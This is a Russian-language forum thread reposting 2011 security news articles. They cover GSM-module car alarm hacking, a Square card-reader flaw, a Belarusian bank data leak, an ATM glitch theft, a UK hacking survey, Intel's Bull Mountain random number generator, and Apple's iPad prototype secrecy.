Свою технологию исследователь назвал словосочетанием «war texting» — трудно переводимым на адекватный русский язык, а в английском непосредственно выведенным от названия другой, более известной хакерской технологии «war driving». Так принято называть езду по городу в автомобиле, оснащенном компьютером, для выявления данных о доступности локальных беспроводных сетей. При подходе Бэйли для «боевой разведки» требуется не вождение машины (driving), а бомбардировка телефонных номеров тестовыми SMS-сообщениями (texting).

Двойные агенты повсюду

Одним из важнейших результатов данных экспериментов стали обнаруженные симптомы проблемы куда более масштабной, чем просто несовершенная защита «противоугонки». В последние годы модули мобильной связи стали встраивать в очень многие устройства, обеспечивая им простой, эффективный и относительно дешевый способ двусторонних коммуникаций. При этом в них применяется практически та же самая архитектура, которая использована в персональных локаторах Zoombak. Подобные GSM-модули замечены в противоугонных автомобильных системах, видеосистемах управления дорожным трафиком, «умных домах», системах безопасности на объектах водоснабжения, умных электрических счетчиках, сенсорах и системах управления промышленными процессами (SCADA) и многих, многих других местах. Однако, согласно Бэйли, безопасность во всех случаях бралась в расчет в самую последнюю очередь, поэтому очень многие из данных устройств легко поддаются взлому и последующим злоупотреблениям.

Очень удобно и эффектно управлять автомобилем со смартфона. Главное, чтобы этим не занялся кто-то другой

Технологически обратная связь по GSM реализована очень просто, если не сказать — примитивно. Факты таковы, что устройства с GSM-модулем можно поставить под свой контроль всего за пару часов. Отчего так? Да просто модуль этот воспринимается производителями систем как некая вещь в себе, в которой и так все нормально. Соответственно, они не тратят время на добавление средств обеспечения секретности или целостности. Казалось бы, в аппаратных решениях не должно быть зияющих дыр, аналогичных известным SQL-инъекциям в программном обеспечении. А они есть...

Насчет «пары часов на взлом» — это вовсе не оборот речи. После того как Бэйли обнаружил фатальные слабости в архитектуре GSM-модуля Zoombak, они со своим коллегой по iSEC Мэттом Солником начали искать для опытов другие системы с аналогичной архитектурой безопасности, и много времени на это не потребовалось. Первыми жертвами — по объяснимым причинам — стали специализированные решения для защиты автомашин. Бэйли уже знал, что в противоугонных автомобильных системах используются примерно такие же GSM-модули, поэтому он просто пошел и купил один аппарат для себя — разумеется, другой марки. И примерно через два часа после покупки они с приятелем уже могли делать с этой системой практически что угодно.

Попутно быстро выяснилось не только идеальное сходство архитектуры, но и то, что никто из ее продающих не понимает, насколько она слаба с точки зрения безопасности. Нет, чисто теоретически все довольно надежно. Для работы с мобильными «приложениями безопасности» в машине, смартфон автовладельца сначала соединяется с центральным сервером, а тот, в свою очередь, посылает «секретные числовые коды» машине для того, чтобы себя аутентифицировать и передать нужные команды. Так, во всяком случае, представляют надежность подобных систем те, кто их продает.
23553
Однако исследователям iSec потребовалось всего около тех самых двух часов, чтобы выяснить, как перехватить радиосигналы между автомобилем и сетью, проанализировать сообщения, пересылаемые между сервером и машиной по мобильной сети, сделать обратную инженерную разработку (re-engineering) применяемого протокола, а затем воспроизвести те же самые команды со своего ноутбука.

Как свидетельствует Бэйли, по мере углубления в исследование он со все большим изумлением обнаруживал, что ни автопроизводители, ни изготовители противоугонных средств даже не пытаются хоть как-то затруднить обратную инженерную разработку своих систем безопасности: «Они не делают даже самых элементарных вещей, типа сокрытия маркировки чипов. Я просто открыл корпус и тут же опознал один довольно известный чип. Уже через две минуты у меня были все нужные спецификации, я знал, к каким портам подключаться и что дальше делать со всем этим хозяйством».

Бэйли пока не хочет раскрывать изготовителей двух противоугонных автомобильных систем, которые были полностью скомпрометированы в ходе исследований. По уже накопленному опыту можно предположить, что и прочие подобные устройства в аналогичной степени уязвимы для обратной инженерной разработки и злоупотреблений через GSM или другие каналы мобильной связи. И хотя фирменные протоколы подобных систем безопасности изготовителями никогда не раскрываются, сегодня атакующая сторона может легко ознакомиться с «секретными» аспектами в работе противоугонных устройств по стандартным каналам. Модуль GSM становится своего рода засланным казачком, разговорить которого знающим людям не составляет особого труда.

По мнению исследователей, продемонстрированный ими взлом автомобильной сигнализации — всего лишь крошечный фрагмент огромной беды, угрожающей всем, кто оснащает свои системы управления GSM-модулями или аналогичными им устройствами для других систем сотовой связи. И, разумеется, их пользователям. «То, что мне удалось всего за пару часов возни с противоугонной системой, становится жуткой угрозой, если вы задумаетесь о других устройствах аналогичной конструкции — таких как SCADA-системы для управления промышленным производством или видеокамеры управления дорожным трафиком, — говорит Дон Бэйли, — То, насколько быстро злоумышленник способен «раскрутить» такие решения, просто не может не пугать».

Действительно здорово управлять всем домашним хозяйством из любой точки мира. Главное, чтобы никто не решил «порулить» без спроса

Не меньше беспокойства у исследователей вызывает и тот факт, что исправить сложившуюся ситуацию будет чрезвычайно непросто. Стандартные модули для сетей мобильной связи различных стандартов выпускаются миллионными тиражами, и до Бэйли об их потенциальной небезопасности никто всерьез не задумывался. Фактически создана целая инфраструктура, на реформирование которой — если оно вообще будет признано необходимым — могут уйти годы. Должен измениться сам подход к созданию конструкторов из готовых модулей, каждый из которых по умолчанию признается безопасным — просто потому, что иначе вроде бы и быть не может. Это опасное заблуждение, позволяющее, впрочем, существенно удешевлять и ускорять процесс разработки, в случае с системами безопасности и жизнеобеспечения должно как можно скорее уйти в прошлое. Да, если компаниям придется делать электронную начинку самим или серьезно «допиливать» чужие решения, ценники могут подрасти. Но зато машина и личное имущество, скорее всего, останутся при вас, а «умный дом» не превратится в площадку для съемок реалити-шоу, доступного для просмотра всем желающим.

Но можно и не переплачивать. Если, конечно, вас не интересует результат.23555

SAWWA
08.08.2011, 15:56
news.tut.by/it/244905.html
Банковские карты и смартфоны несовместимы


Компания Square предлагает компактные считыватели для электронных карт и сопутствующее ПО. С их помощью владелец смартфона на платформе Android, а также iPhone, iPad или iPod touch может превратить свой аппарат в банкомат, который только что не выдает и не принимает наличные. ПО и считыватель — бесплатные; за операции, проведенные через Square, пользователь теряет 2,75% в виде комиссионных.

Идея Square — отличная, но реализация несколько подвела. Экс-хакер Лори обратил внимание на то, что считыватель для электронных карт вставляется в аудиоразъёмы смартфонов, из чего было заключено, что номера карт передаются в виде звуковых файлов. Специалисты написали программу, осуществляющую кодирование. На Black Hat они показали систему из ноутбука, на котором была установлена их программа, и "Айпада" с фирменным ПО Square. Для кражи денег с её помощью достаточно знать только номер карты; злоумышленник, переводящий "добытое" на свой счет, "платит" лишь 2,75% комиссии. Согласитесь, это гораздо веселее традиционной схемы, которая подразумевает отъём кредитной карты у владельца, приобретение по ней товаров и последующую их продажу бандеру (скупщику краденого).

Сообщается, что Square спешно интегрирует в свои считыватели шифрование данных.

История занимательна тем, что она иллюстрирует негативную сторону взаимосвязанности и открытости всего и вся в интернете: абсолютно неизвестная владельцу электронной карты фирма может поставить под угрозу его финансовую безопасность.

SAWWA
14.08.2011, 02:14
МТБанк признает вину за утечку данных о потенциальных кредитополучателях

http://www.belta.by/ru/all_news/society/MTBank-priznaet-vinu-za-utechku-dannyx-o-potentsialnyx-kreditopoluchateljax_i_567236.html
11 августа, Минск /Корр. БЕЛТА/. МТБанк наряду со своими партнерами полностью разделяет ответственность за технический сбой на сайте банка, в результате чего была кратковременно доступна информация по электронным заявлениям о возможности получения услуг банка. Об этом сообщили корреспонденту БЕЛТА в Минском транзитном банке.

Утечка данных произошла вчера вечером. Сведения о нескольких тысячах белорусов, заполнивших анкеты для получения кредита, оказались в открытом доступе. В сеть попали паспортные данные, номера телефонов, адреса проживания, суммы заработных плат потенциальных кредитополучателей. В течение часа техническая ошибка была исправлена, однако некоторым пользователям этого времени было достаточно, чтобы скачать информацию и впоследствии выложить ее на другие интернет-ресурсы.

В МТБанке в то же время отметили, что речь идет "не о списке клиентов, а именно о списке физических лиц, обращавшихся на сайт банка с заполнением непосредственно на сайте электронных предварительных заявлений". Из содержания заявлений нельзя понять, каков итог рассмотрения их заявлений и стали ли они в итоге клиентами банка.

Касаясь причины утечки, в банке отметили, что информация стала доступной не с внутренних серверов банка, а с внешних серверов компании-подрядчика, предоставляющей услуги хостинга. "При этом МТБанк полностью разделяет ответственность за возникшие обстоятельства наряду со своими партнерами и приносит свои искренние извинения клиентам и пользователям сети Интернет за возникшие неудобства", - подчеркнули его представители. При этом в банке проведут внутреннее разбирательство, по результатам которого будут приняты строгие меры к ответственным за технический сбой.

По предварительной информации, утечка данных МТБанка произошла из-за человеческого фактора. Об этом сегодня пишет БЕЛТА со ссылкой на старшего оперуполномоченного по особо важным делам управления «К» МВД Беларуси Олега Слепченко.

Специалисты управления «К» сразу заинтересовались инцидентом: связались с представителями службы безопасности банка и сверили данные, которыми располагают. Предварительные выводы позволяют исключить внешнюю атаку как возможную причину утечки данных МТБанка.

«Несмотря на то, что банк заинтересован в расследовании причин инцидента, заявления с его стороны, равно как и от его потенциальных кредитополучателей, пока не поступало, — отметил Олег Слепченко. — Однако в управлении „К“ следят за развитием ситуации и готовы подключиться к работе и в рамках компетенции оказать необходимую помощь».

Читать полностью: http://www.onliner.by/news/12.08.2011/11.14

SAWWA
27.08.2011, 01:26
В Красноярском крае полицейские задержали молодого человека, обманувшего банкомат на полмиллиона рублей
26 августа 2011

Накануне в дежурную часть МО МВД России «Назаровский» поступило заявление о том, что 8 августа неизвестный гражданин, используя сбой компьютерной программы, снял при помощи электронной карты с одного городских банковских терминалов денежные средства в размере около 463 тысяч рублей.

22-летний молодой человек хотел снять со своего счета недавно поступившие на него 46 тысяч рублей. Так как максимальная сумма, которую выдавало устройство, равнялась 15 тысячам рублей, процедуру ему пришлось повторить три раза. После последней операции, к удивлению гражданина, на карте все еще остались только что снятые им деньги. Один раз воспользовавшись сбоем системы, молодой человек не мог остановиться и снимал максимальную сумму снова и снова, и покинул помещение банка, лишь когда в его карманах оказалось около полумиллиона рублей.

В течение нескольких дней назаровец активно тратил незаконно присвоенные деньги: снимал в Красноярске квартиры «посуточно», посещал сауны и ночные клубы. Вся выданная банкоматом наличность вскоре закончилась и молодой человек вернулся в Назарово. Он не подозревал, что его уже ищут сотрудники полиции. Накануне «удачливый» парень был задержан, в настоящее время в отношении него собираются материалы проверки, решается вопрос о возбуждении уголовного дела.

Пресс-служба ГУ МВД России по Красноярскому краю
http://mvd.ru/news/show_96371/

SAWWA
08.09.2011, 04:24
13% британцев сознались в "бытовом хакерстве"
http://www.xakep.ru/post/56726/
Исследование компании CPP показало, что 13% британских пользователей когда-либо входили в чей-либо аккаунт без разрешения.

Социальные сети, такие как Facebook, являются наиболее популярной мишенью для таких хакеров. Однако личная и деловая переписка, порталы для денежных транзакций, такие как PayPal и интернет-банкинг, также не остались в стороне и посещались этими пользователями без ведома их владельцев.

Из всех сознавшихся в "повседневном хакерстве" около трети (32%) сказали, что они делали это просто так, чтобы развлечься. 29% опрошенных хотели проследить за своими партнерами и 8% следили за своими коллегами. Однако были и 2%, которые хотели получить из добытой информации финансовую выгоду.

CPP также выяснила, что 16% пользователей пострадали от того, что их защищенные паролями аккаунты посещали другие лица, без их ведома. Около четверти (24%) из них заявили о том, что их электронные ящики были взломаны, 7% сообщили что кто-то заходил в их аккаунт, предназначенный для деловой переписки. Каждый пятый (19%) признался в том, что его аккаунт на eBay был взломан, 16 % сообщили о том, что пострадал их аккаунт социальной сети.

Кроме того, каждый десятый заявил о том, что на его имя был взяты деньги или ссуда в банке без его на то разрешения.

"Возможно, многие люди считают забавным взломать аккаунт своего друга или коллеги, однако, на самом деле то, чем они занимаются, называется хакерство", - говорит Дэнни Гаррисон, эксперт по мошенническим операциям в CPP.

"Получение чьей-то личной информацией без ведома на то ее владельца является серьезным поступком и может привести к далеко идущим последствиям, как для личной жизни хакера, так и для его карьеры. Мы призываем всех следить за своими паролями и внимательно наблюдать за своими аккаунтами".

Пятая часть (17%) пользователей сознались в том, что они просматривали видео в интернете, которое являлось руководством по взлому аккаунтов, и 87% опрошенных считают, что подобное видео не должно находиться в широком доступе.

Две трети (63%) хотят, чтобы хакерские руководства были удалены, а 56% считают, что этим должно заняться правительство. Кроме этого, 59% полагают, что эти видео способствуют развитию мошенничества в интернете.

"Хакерство представляет серьезную угрозу для потребителей и предпринимателей и они должны принять меры для защиты своих личных данных. Люди обеспокоены тем, что информация, защищенная паролями, может быть использована без их ведома, и мы призываем правительство пересмотреть свое мнение по поводу доступности этих обучающих хакерству уроков", - добавил Гаррисон.

CPP советуют пользователям, которых волнует безопасность их личных данных, регулярно менять пароли, пользоваться безопасными Wi-Fi соединениями и опасаться сайтов с неизвестными сертификатами и всплывающими окнами.

практика показывает, на самом деле при тщательном анализе информации их социальных сетей можно вычленить пароли и кодовые слова..

SAWWA
10.09.2011, 02:23
Тропинки к «Бычьей горе"
http://www.3dnews.ru/offsyanka/616575/
Автор: Бёрд Киви
http://www.zamkidveri.com/forum/images/imported/2011/09/3dn-1.gif?3384650
Дата: 09.09.2011

Новые процессоры Intel научатся шифровать данные с невиданной доселе скоростью и надежностью. Берд Киви рассказывает об истории подхода, выбранного Intel, а также приводит ряд примеров, когда абсолютно надежные системы обнаруживали в себе лазейки для государственных органов

Начиная с чипов нового семейства Ivy Bridge, компания Intel будет аппаратно встраивать в свои микропроцессоры цифровой криптогенератор на основе подлинно случайных чисел. Новая криптографическая технология получила кодовое наименование Bull Mountain («Бычья гора», по названию населенного пункта в штате Орегон, расположенного неподалеку от исследовательского центра Intel's Circuit Research Lab в г. Хиллсборо, где и была проделана основная часть работы над Bull Mountain). Для того чтобы стало понятнее не только происхождение странноватого названия, но и то, почему появление новой криптотехнологии можно назвать действительным событием, предлагаю взглянуть на предмет в более широком историческом, теоретическом и прикладном контексте.

Немного истории

Случилось так, что развитие теории информации и научной криптографии с самого начала шли бок о бок. То есть четкое представление о том, что любую информацию — тексты, картинки, речь, музыку и прочее — можно передавать в двоичном виде как последовательность нулей и единиц, пришло к человечеству практически одновременно с пониманием того, как должны быть устроены шифры для абсолютно надежного засекречивания такого рода передач.

Более того, и отцом обеих великих идей стал один и тот же человек — Клод Элвуд Шеннон. Работая в годы Второй мировой войны над задачами обеспечения надежной связи, Шеннон сумел строго математически показать, что защита сигнала от шумовых помех и шифрование информации — это, по сути дела, две стороны одной и той же проблемы.
http://www.zamkidveri.com/forum/images/imported/2011/09/shannonmouse_in_maze-1.jpg
Клод Шеннон в годы открытий

То есть в любом сигнале электросвязи всегда присутствуют две компоненты — полезная информация и хаотический шум электростатических помех, искажающих эту информацию. Для связистов главная задача, конечно же, заключается в эффективной очистке сигнала от шума. А криптографы, которые, по сути дела, накладывают на сигнал искусственный шум с помощью шифрования, заинтересованы в том, чтобы никто, кроме законного получателя, не мог восстановить информацию из-под наложенных шифром помех.

Математическое обоснование этой концепции позволило Шеннону доказать, что существует совершенно стойкий шифр, который в принципе невозможно вскрыть аналитически — даже при наличии у противника любых вычислительных и временных ресурсов. Причем шифр этот устроен довольно тривиально (хотя и не очень удобно для практического применения): при каждом засекречивании сообщения длина ключа — или шифрующей последовательности — должна быть точно такой же, как у открытого текста. И если биты этого ключа были сгенерированы на основе чисто случайного хаотического процесса (вроде подбрасывания монеты или сигналов от датчика теплового шума), а побитное наложение этой последовательности для шифрования сеанса происходило строго один раз, то у противника нет никаких шансов вскрыть такую систему без ключа.
http://www.zamkidveri.com/forum/images/imported/2011/09/P1010122-1.jpg
В годы Второй мировой серийные шифровальные машины были довольно громоздкими, а уровень защиты оставлял желать лучшего даже по меркам докомпьютерной эпохи

Пример с тепловым шумом здесь далеко не случаен, поскольку уже само рождение научной теории информации и криптографии происходило под влиянием физико-математического аппарата для описания термодинамических процессов. Шеннон по совету видного научного светила Джона фон Неймана привлек в свою теорию понятие «энтропии» — математической меры, применяемой в термодинамике и статистической физике для характеристики степени хаотичности или разупорядоченности систем. У Шеннона энтропия стала мерой хаотичности сигнала, а количество информации, соответственно, было определено как величина, обратная энтропии.

Вспоминая впоследствии этот эпизод, Шеннон не без юмора рассказывал, что вообще-то фон Нейман обосновывал свой совет сугубо прагматичными соображениями: в те времена среди математиков и инженеров мало кто был наслышан об энтропии, а потому автор получил бы огромное преимущество в неизбежных грядущих спорах вокруг новой теории. Вместо споров и критики, однако, произошло очень быстрое и повсеместное признание теории информации научно-техническим сообществом — вполне сравнимое со всеобщим признанием компьютерной архитектуры фон Неймана, реализованной ныне в абсолютном большинстве вычислительных устройств.

Ну а в криптографии, как показывает жизнь, несмотря на все грандиозные достижения цифровых технологий, физические источники хаотического шума по-прежнему являются наиболее качественными источниками энтропии для генераторов криптоключей. Или, как их чаще называют из-за востребованности во множестве других областей, для генераторов случайных чисел.

Немного теории

Теперь давайте вкратце разберемся с тем, что принято называть генераторами случайных чисел или кратко RNG (от Random Number Generator). А также с тем, какие их разновидности сегодня используются чаще всего.

Как в учебнике, вводим определение. Под термином RNG понимается подпрограмма или аппаратное устройство, где на выходе порождается такая последовательность чисел из некоторого интервала, что ее значения выглядят непредсказуемыми. Если пояснять непредсказуемость более формально, то каждое значение числа на выходе должно быть статистически независимым от предыдущих значений; общее распределение чисел, выбираемых из интервала, является равномерным; а в последовательности их появления не видно закономерности.
В дополнение к этому от современного RNG обычно хотят, чтобы он был достаточно быстрым в выдаче чисел и обладал способностью к масштабированию (то есть при необходимости мог бы порождать нужный выход в ответ на большое число запросов за короткий интервал времени). Кроме того, криптографический RNG должен быть стойким против атак злоумышленников, которые могут наблюдать числа на выходе или менять стартовое состояние генератора, дабы затем предсказывать следующие выходные значения, влиять на выход или как-то еще вмешиваться в работу функций генератора.

Если подразделять генераторы случайных чисел на классы, то несколько базовых разновидностей выглядят следующим образом.

Генераторы псевдослучайных чисел, или PRNG. Самый распространенный ныне тип RNG, использующий детерминированный алгоритм, в типичных случаях реализованный в программном виде и вычисляющий последовательность чисел, которые «выглядят как случайные». В начале процесса генерации требуется число — «зерно для засева», на основе которого PRNG будет всегда выдавать в точности ту же самую последовательность «случайных чисел». Понятно, что на самом деле генерируемые таким образом числа далеко не случайны. Поэтому в большинстве своем PRNG, или ПСЧ-генераторы, считаются криптографически небезопасными.

Криптографически безопасные ПСЧ-генераторы, или CSPRNG (Cryptographicaly Secure PRNG). Качественный с точки зрения криптографии генератор псевдослучайных чисел должен отвечать трем главным требованиям:

Выдавать последовательность, статистически неотличимую от случайной равновероятной;
Противостоять восстановлению прошлых состояний по известному;
Противостоять восстановлению будущих состояний по текущему состоянию алгоритма. На сегодняшний день у разработчиков имеется хорошее понимание, каким образом должен быть в принципе устроен алгоритм, отвечающий всем этим трем требованиям. Но для того, чтобы все работало как надо, необходимо обеспечивать дополнительную «рандомизацию», то есть постоянное подмешивание в алгоритм случайных чисел извне. По этой причине особую ценность у криптографов имеют генераторы следующего типа, TRNG.
Генераторы подлинно случайных чисел, или TRNG (True RNG). Эти устройства не используют никаких математических моделей для детерминированного порождения чисел, «похожих на случайные». Вместо этого TRNG выделяют энтропию (элемент случайности) из работы физического источника того или иного типа, а затем используют ее для генерации случайных чисел. Физическим источником энтропии могут быть самые разные процессы — вроде нажатия кнопок на клавиатуре или беспорядочных движений манипулятора-мышки. Другой известный пример: на протяжении многих лет одним из популярных TRNG в Интернете был веб-проект Lavarand, где случайные биты генерировались на основе хаотичного поведения форм из расплавленного парафина, порождаемых в «лавовой лампе»... Генераторы типа TRNG обычно очень хороши своей недетерминированностью, однако среди их главных минусов обычно выступает недостаточно высокая производительность и не слишком гладкие «от природы» статистические свойства, желательные в криптографии.

Генераторы каскадной конструкции или CCRNG (Cascade Construction RNG). Можно сказать, оптимальная на сегодняшний день схема криптогенератора для реальных высокоскоростных приложений. Этот тип нашел широкое применение в современных операционных системах и криптографических программных библиотеках. Здесь вход берется от физического источника энтропии, чтобы обеспечить буфер, или «пул энтропии». После чего этот энтропийный пул используется для выдачи недетерминированных случайных чисел, которые в качестве «зерен» периодически засевают криптографически безопасный псевдослучайный генератор (CSPRNG).

Помимо хороших статистических характеристик, одно из важнейших достоинств каскадной конструкции — это высокая производительность. Взятие образцов от источников энтропии зачастую может быть медленным, поскольку обычно подразумевает участие входа/выхода устройства того или иного типа, а также некоторое время на то, чтобы произошло собственно событие взятия образца в реальном времени. Но если придумать такую схему, чтобы пул энтропии пополнялся подлинно случайными числами достаточно быстро, каскадный генератор CCNRG можно сделать одновременно и чрезвычайно быстродействующим (на основе аппаратно реализованного PRNG), и криптографически высокостойким, благодаря очень частому засеву алгоритма подлинно случайными зернами.
http://www.zamkidveri.com/forum/images/imported/2011/09/SandyBridge_Mobile_Chip2-1.jpg
Исследования в области криптографии ведутся инженерами Intel уже много лет, и нынешняя итерация — это не робкие шаги к успеху, а, скорее, венец творения

Именно такую конструкцию и сумели реализовать разработчики Intel в своем новом криптогенераторе Bull Moutain, который планируется массово встраивать в процессоры, начиная с поколения Ivy Bridge.

Бочка меда

Вообще говоря, встраиванием в микропроцессоры генераторов чисто случайных чисел на основе природной энтропии разработчики корпорации Intel начали заниматься довольно давно. Первые такие модули стали появляться в интеловских чипах еще с 1999 года. Там в качестве TRNG выступала компактная аналоговая конструкция, работавшая на основе теплового шума, который имеется во всех резисторах электрических схем.
http://www.zamkidveri.com/forum/images/imported/2011/09/shemaintel_drng-1.jpg
После усиления этого хаотического шума формируемый из него дрожащий сигнал изменял период цикла в относительно медленно «тикающих» часах. Для каждого из тактов этих беспорядочно «тикающих» медленных часов схема чипа брала выход от вторых, быстро «тикающих» часов, которые поочередно выдавали бинарные значения 0 и 1. В результате беспорядочной выборки битов с этого выхода и получалась подлинно случайная последовательность из нулей и единиц генератора.

Один из главных минусов этой аналоговой конструкции был в том, что для усиления теплового шума потреблялось немало энергии. Хуже того, данная схема работала в чипе постоянно и независимо от того, нужны ли приложениям в данный момент случайные числа или нет.

Другой существенный минус аналоговых компонентов внутри чипа — это серьезные проблемы в ситуациях, когда в очередной раз приходит время менять производственные технологии в сторону более совершенных техпроцессов. Для цифровых элементов схем КМОП-технологии этот регулярный переход осуществляется относительно просто, а вот для каждого нового поколения ужатых аналоговых схем все оказывается гораздо сложнее. Потому что аналоговые компоненты всякий раз требуют дополнительной конструкторской доработки и тестирований, чтобы обеспечивать нужное соотношение сигнал-шум.
http://www.zamkidveri.com/forum/images/imported/2011/09/Intel22nm_Transistor_2-1.jpg
то только на многократно увеличенной фотографии 22-нанометровые 3D-транзисторы выглядят достаточно солидно. На практике же сохранить в них работающую аналоговую часть, мягко говоря, непросто

Принимая во внимание все эти проблемы, к 2008 году конструкторы Intel всерьез озаботились задачей по созданию такого генератора подлинно случайных чисел, который использовал бы в своей работе исключительно цифровые элементы схемы.

Согласно приведенной выше таксономии, архитектура нового генератора соответствует модели каскадной конструкции. То есть высокоскоростной (3 миллиарда бит в секунду) источник энтропии, резидентно находящийся в процессоре, используется для часто повторяемого засевания случайными зернами алгоритма, аппаратно реализующего CSPRNG.

Чтобы гарантировать высокое криптографическое качество случайных чисел, с огромной скоростью порождаемых на выходе схемы, в Intel разработали специальный трехэтапный процесс генерации. Помимо базовой аппаратной схемы цифрового TRNG (первый этап), данный процесс также предусматривает «кондиционер» для концентрации случайностей в битах от физического источника (второй этап) и псевдослучайный генератор чисел для повышения производительности (заключительный третий этап). В совокупности же вся эта конструкция и получила кодовое наименование Bull Mountain.

Как подчеркивают разработчики, Bull Mountain изначально создан в соответствии со множеством криптографических стандартов, чтобы была гарантирована надежность и прозрачность реализации новой схемы. Эти стандарты включают в себя NIST SP800-90, FIPS-140-2 и ANSI X9.82.
Самой же интересной частью схемы, конечно, является конструкция цифрового TRNG. Решение, которое удалось найти разработчикам, по праву можно называть парадоксальным, потому что с формальной точки зрения оно нарушает одну из главных заповедей для конструкторов цифровых схем: модули схемы должны находиться в хорошо определенном состоянии, давая на выходе только логические 0 и 1.

В конструкции нового RNG, однако, этот принцип, по сути, поставлен с ног на голову. Данная схема построена на основе известного феномена «метастабильности» — обычно крайне нежелательного эффекта в логических схемах, использующих больше одной тактовой частоты. Под действием нескольких управляющих сигналов элементы такой схемы могут «подвисать» в нечетко определенном состоянии между 0 и 1, а выход из этого состояния зависит от случайностей — типа тепловых микровозбуждений в молекулярной структуре схемы. Цифровой же генератор, созданный командой разработчиков Intel, устроен таким образом, что здесь хаотическим результатом метастабильности является в буквальном смысле каждый бит на выходе модуля.

Более того, эта случайность результата еще и усиливается дополнительно с помощью петли обратной связи, настраивая метастабильность таким образом, чтобы бит падал в состояние 1 или 0 с примерно равной вероятностью. По сути дела, это «превращает данный процесс в электронный эквивалент подбрасывания монеты» — как прокомментировал конструкцию Грег Тэйлор (Greg Taylor), директор Circuit Research Lab и руководитель проекта «Бычья гора».

Еще немного истории

На этом месте самое время еще раз упомянуть о делах отца научной криптографии Клода Шеннона. Сегодня мало кто вспоминает, что все свои великие открытия и работы Шеннон сделал до 40 лет, работая в стенах знаменитого исследовательского центра Bell Research Labs. А затем по неведомой причине Шеннон вдруг резко охладел к передовым разработкам, в 1958 году уволился из Bell Research и занялся тихой преподавательской деятельностью в стенах Массачусетского технологического института. С той поры он не выдал ни одной работы, по своему масштабу хоть как-то соизмеримой с его прошлыми теоретическими достижениями.

Но это вовсе не означает, что большой ученый предавался безделью. Совсем наоборот, помимо безусловного теоретического дара, Шеннону были присущи таланты рукастого и изобретательного инженера-конструктора, благодаря которым он постоянно и очень увлеченно занимался созданием самых разных механизмов и гаджетов — от лыж для хождения по воде до роботов, жонглирующих мячиками.
юди, бывавшие в большом доме Шеннона, похожем на гибрид музея и мастерской, впоследствии рассказывали о множестве удивительных вещей, изготовленных ученым. Например, было там развлекавшее посетителей механическое устройство, которое работало как подбрасыватель монеты. Устройство было настроено Шенноном настолько точно, что он мог заранее задавать количество оборотов монеты в воздухе, абсолютно точно программируя таким образом исход как будто бы чисто случайного эксперимента с выпадением орла или решки.

Интерес ученого к тонким взаимосвязям между случайными и детерминированными процессами в 1960-е годы дал и еще один занятный результат: миниатюрный, размером с пачку сигарет аналоговый компьютер, позволявший предсказывать наиболее вероятный сектор-осьмушку для шарика рулетки, запускаемого крупье в казино (расчет по скорости вращения колеса и начальной скорости шарика). Другой участник этого «строго засекреченного» проекта, известный математик Эдвард Торп, тридцать с лишним лет спустя рассказал на одной из научных конференций, что данное устройство действительно работало, и они с Шенноном даже специально ездили в Лас-Вегас для его практического применения…

Ложка дегтя

Набор упомянутых фактов из биографии великого ученого понадобился здесь для того, чтобы наглядно продемонстрировать, сколь эффективно оперируют совершенно случайными, казалось бы, процессами те люди, которые глубоко понимают их подлинную, «не совсем случайную» природу.

В области защиты информации такую позицию глубоко понимающего наблюдателя занимают криптографические спецслужбы, и в первую очередь самая крупная и мощная из них — АНБ США. По давно сложившейся традиции, в АНБ очень ревниво относятся к появлению на рынке сильной криптографии, не поддающейся быстрому аналитическому вскрытию, а потому используют все доступные им рычаги для внешне незаметного ослабления шифров и генераторов криптоключей.

В самой примитивной форме эту стратегию контроля реализуют элементарным укорачиванием ключа, оставляя рабочими лишь бит 40 или около того, а остальные принудительно забивая нулями или оставляя постоянными. Как это сделано, к примеру, в телефонах GSM или в крипточипах противоугонных автомобильных систем. В частности, в применявшихся вплоть до последнего времени системах на основе RFID-чипов DST фирмы Texas Instruments длина ключа составляла всего 40 бит, а в системах на основе KeeLoq фирмы Microchip, где общая длина ключа 64 бита, реально работают и изменяются при каждом сеансе лишь 28 бит.

В несколько более изощренной форме эта же стратегия может принимать форму криптоалгоритмов с любой, в принципе, рабочей длиной ключа, но функционирующих таким образом, что для грамотного вскрытия этот (или эквивалентный ему) ключ подбирается очень просто или вообще известен заранее. Нечто подобное, в частности, было реализовано в единой схеме генератора криптоключей всех версий ОС Windows вплоть до Win XP.


Известно, что подобная участь не обошла стороной и некоторые из прошлых криптосхем Intel. Например, бесспорно квалифицированные специалисты именно этой компании разрабатывали одиозно известную систему CSS DVD для защиты от копирования контента на видеодисках. В итоге этой разработки получилась криптосхема, защиту которой современные программы копирования снимают столь легко, что многие пользователи подобных программ даже не осознают, что взламывают систему, некогда полагавшуюся очень сильной. Почему так вышло, официально никто не объяснял. Однако в кулуарах Сети давно гуляют анонимные признания сотрудников фирмы, согласно которым Intel просто «попросили» реализовать слабую криптозащиту, понадеявшись на сохранение схемы в тайне.

В случае с грядущей массовой доступностью мощного криптогенератора в новых процессорах Intel Ivy Bridge все обстоит гораздо серьезнее, чем с защитой фильмов на DVD. Фактически благодаря системе Bull Mountain кто угодно — террористы, бандиты и, конечно же, чертовы педофилы (стандартный набор параметров в доводах за ослабленное крипто) — получают возможность быстро и дешево создавать совершенно стойкие шифры почти по Шеннону, гарантированно противостоящие взлому. Все, что для этого надо, — просто вызвать новую инструкцию процессора RdRand и на огромной скорости сгенерировать сотни гигабайт случайной шифрпоследовательности, разбитой на странички по 1000, скажем, знаков для удобства употребления одноразового шифра в переписке. Создать копированием второй экземпляр массива — и все...

Возможно, конечно, что в АНБ подобные угрозы уже никого вдруг ныне не волнуют. Вот только верится в это как-то с трудом.
http://www.3dnews.ru/offsyanka/616575/

вот и верь потом электронным замкам... железная часть - ничего, а вот в программной составляющей сокрыто много привлекательного для злоумышленника

SAWWA
14.09.2011, 00:40
http://www.zamkidveri.com/forum/images/imported/2011/09/3dn-1.gif?5644011
Разработчик рассказал, как охраняли секреты Apple iPad
http://www.3dnews.ru/news/#616843
Владимир Мироненко
http://www.zamkidveri.com/forum/images/imported/2011/09/AppleiPad_1-1.jpg
В связи с истечением оговоренного компанией срока давности, один из разработчиков, получивших, как он утверждает, возможность поработать с прототипом готовящегося к релизу Apple iPad, рассказал о мерах безопасности, предпринимавшихся компанией во избежание утечки информации о новом продукте.
В перечне мер по охране секретов «яблочного» планшета, которые назвал разработчик, были следующие позиции:

Все работы велись в комнате без окон, в дверях сменили замки;
В комнату имели доступ только четыре разработчика;
Apple потребовала имена и личные номера социального страхования разработчиков, имевших доступ к устройству;
Планшеты были прикреплены к столу велосипедными замками;
Внешний вид планшета маскировался с помощью дополнительного каркаса, поэтому даже разработчики не могли определить формфактор планшета — им был виден лишь его экран;
